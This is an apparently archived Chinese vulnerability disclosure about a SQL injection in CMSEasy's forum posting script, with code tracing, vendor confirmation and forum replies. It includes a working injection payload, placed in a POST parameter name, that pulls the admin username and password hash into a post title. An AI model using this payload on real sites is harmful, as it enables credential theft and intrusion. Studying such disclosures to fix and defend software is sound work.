cmseasy 最新版SQL注入一枚(直接出数据无视360webscan)

漏洞与 http://**.**.**.**/bugs/wooyun-2014-067464 重复。

注入函数在/bbs/add-archive.php，

if(isset($_POST['submit'])){
      if(strtolower(trim($_POST['verify'])) != strtolower($_SESSION['verify'])){
           //action_public::turnPage('index.php','验证码输入错误！');
      }
       $archive = db_bbs_archive::getInstance();
       
       unset($_POST['submit']);
       unset($_POST['verify']);
 
       $_POST['username'] = $_COOKIE['login_username'];
       $_POST['userid'] = $admin->userid;
       $_POST['ip'] = $_SERVER['REMOTE_ADDR'];
       $_POST['addtime'] = mktime();
 
       if($id = $archive->inserData($_POST)){
           action_public::turnPage('archive-display.php?aid='.$id,'文章添加成功');
       }else{
          action_public::turnPage('index.php','添加失败，请联系我们！');
       }
   }

关注这句话$archive->inserData($_POST)，直接把$_POST放入了inserData函数，我们进去看看：

public function inserData($data){
        $r = $this->odb->insert($this->tblName,$data);
        if($r)
            return $this->odb->getInsertId();
        else
            return false;
  }

继续跟进：

public function insert($table, $data)
  {
   $sql = $this->getInsertString($table, $data);
   return $this->execSql($sql);
  }

继续跟进：

public function getInsertString($table, $data)
  {
   $n_str = '';
   $v_str = '';
   $table = $this->filterString($table);
   foreach ($data as $k => $v)
   {
    $n_str .= $this->filterString($k).',';
    $v_str .= "'".$this->filterString($v)."',";
   }
   $n_str = preg_replace( "/,$/", "", $n_str );
   $v_str = preg_replace( "/,$/", "", $v_str );
   $str = 'INSERT INTO '.$table.' ('.$n_str.') VALUES('.$v_str.')';
   return $str;
  }

这个函数实际上就是一个insert语句。其中调用filterString对数据进行过滤。但只是加转义单引号而已，而注入语句中的key并没有过滤。

POST的时候，将注入语句放在KEY的位置，就能注入了。

详见漏洞证明。

到/bbs，发表帖子，抓包。

增加一个POST参数，参数名是：

username)/**/values((select/**/concat(username,0x23,password)/**/from/**/cmseasy_user/**/limit/**/0,1),2,3,4,5,6)#

值随意。效果图如下：

发送即可。然后数据库中可以看到一篇帖子的title被注入成管理员密码：

它的aid是8，那么我们只要访问http://localhost/easy/bbs/archive-display.php?aid=8即可看到结果：

我们不知道aid是多少的时候，遍历一下就行了。

value要过滤，key也要过滤

厂商回应：

危害等级：高

漏洞Rank：20

确认时间：2014-07-07 09:49

厂商回复：

感谢，立即修正

最新状态：

暂无

1. 2014-07-06 10:40 | mramydnei ( 普通白帽子 | Rank:400 漏洞数:87 )

   0

   师傅，你为什么这么叼？

   1# 回复此人

2. 2014-07-06 15:07 | xfkxfk ( 核心白帽子 | Rank:2341 漏洞数:353 | 呵呵！)

   0

   你为什么这么叼？

   2# 回复此人

3. 2014-07-06 23:47 | xch4er ( 路人 | Rank:7 漏洞数:2 | 小弟才疏学浅,前来悉心与各位大牛研究探索.)

   0

   师傅，你为什么这么叼？

   3# 回复此人

4. 2014-07-09 13:33 | Smilent ( 实习白帽子 | Rank:48 漏洞数:8 | None)

   0

   师傅，你为什么这么叼？

   4# 回复此人

5. 2014-07-09 23:07 | HackBraid ( 核心白帽子 | Rank:1914 漏洞数:304 | 最近有人冒充该账号行骗，任何自称HackBrai...)

   0

   注意2楼。。。

   5# 回复此人

6. 2014-07-12 00:02 | AppLeU0 ( 路人 | 还没有发布任何漏洞 | 代码审计入门)

   0

   师傅，你为什么这么叼？

   6# 回复此人

7. 2014-07-14 23:47 | azuer ( 普通白帽子 | Rank:127 漏洞数:31 )

   0

   师傅，你为什么这么叼？

   7# 回复此人

8. 2014-07-29 10:37 | random_ ( 普通白帽子 | Rank:315 漏洞数:52 | 推动开源 推动网络安全)

   0

   师傅，你为什么这么叼？

   8# 回复此人

9. 2014-10-04 01:19 | Murk Emissary ( 实习白帽子 | Rank:74 漏洞数:14 | 低调做人 低调行事)

   0

   师傅，你为什么这么叼？

   9# 回复此人

10. 2014-10-04 08:19 | laoyao ( 路人 | Rank:14 漏洞数:5 | ด้้้้้็็็็็้้้้้็็็็...)

    0

    猴儿们 莫调皮

    10# 回复此人

11. 2014-10-09 11:25 | 噬魂 ( 普通白帽子 | Rank:141 漏洞数:37 | 08安全团队)

    0

    师傅，你为什么这么叼？

    11# 回复此人

12. 2015-06-07 15:23 | Eric_zZ ( 路人 | Rank:8 漏洞数:5 | Just try it!)

    0

    楼主，我刚刚搞了下有一些还能注册，但是发帖子抓包的时候老显示验证码错误，大小写都考虑了还是显示验证码错误，这是不是说明也修复了？

    12# 回复此人

13. 2015-06-07 15:50 | Eric_zZ ( 路人 | Rank:8 漏洞数:5 | Just try it!)

    0

    我步骤错了。。。

    13# 回复此人